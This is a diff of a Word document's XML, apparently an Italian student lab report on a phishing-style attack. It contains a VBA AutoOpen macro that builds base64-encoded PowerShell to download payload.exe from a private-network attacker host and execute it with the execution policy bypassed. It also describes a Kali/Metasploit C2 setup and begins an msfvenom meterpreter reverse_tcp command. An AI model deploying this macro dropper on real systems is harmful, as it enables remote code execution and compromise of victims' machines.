-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' Esegu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il comando PowerShell per scaricare il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">    ' Esegu</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il comando PowerShell per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    shell.Run "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t>' Rilascio l'oggetto</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>End Sub</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t xml:space="preserve"> NON OFFUSCATO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sub </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>AutoOpen(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim codificato2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoBase64 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim comandoDaEseguire2 As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Dim shell As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set shell = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VBA.CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WScript.Shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = EncodeBase64("(New-Object </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Net.WebClient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DownloadFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('" &amp; "http://192.168.43.209:8000/payload.exe" &amp; "', '" &amp; "C:\Users\crist\Downloads\virus.exe" &amp; "')")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>eseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    codificato2 = EncodeBase64(" &amp; 'C:\Users\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>crist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\Downloads\virus.exe'")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in base64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    comandoBase64 = "IEX([</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>System.Text.Encoding</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_ENCODED_COMMAND')))"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>decodifico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> due </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da base64 a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>normali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Replace(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">comandoBase64, "BASE64_ENCODED_COMMAND", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>codificato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Replace(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Esegui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PowerShell per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>eseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shell.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>NoProfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ExecutionPolicy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>Rilascio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>l'oggetto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    Set shell = Nothing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>End Sub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>CODICE MACRO</w:t>
       </w:r>
       <w:r>
@@ -802,7 +2427,87 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>In questa sezione dovete presentare le macchine virtuali utilizzate per condurre l’attacco e come sono state configurate.</w:t>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>questa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dovete</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>presentare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>macchine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>virtuali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>condurre</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>l’attacco</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> e come </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sono</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> state configurate.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -821,23 +2526,136 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">L’attaccante </w:t>
-      </w:r>
-      <w:r>
-        <w:t>è la macchina Kali Linux usata a lezione</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> con un ip statico</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, il software utilizzato per creare il server C2 è Metasploit, è stato utilizzato il metodo visto a lezione, di seguito riporto </w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>L’attaccante</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">è la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Kali Linux </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usata</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> con un </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>statico</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, il software </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>creare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il server C2 è Metasploit, è </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>stato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utilizzato</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>metodo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> visto a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lezione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>seguito</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>riporto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>i</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> comandi:</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -850,24 +2668,136 @@
         <w:rPr>
           <w:color w:val="92D050"/>
         </w:rPr>
-        <w:t>//creo il software malevolo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> da scaricare nella macchina della vittima</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST</w:t>
+        <w:t>//</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>creo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il software </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>malevolo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>scaricare</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>nella</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>macchina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>della</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+        <w:t>vittima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
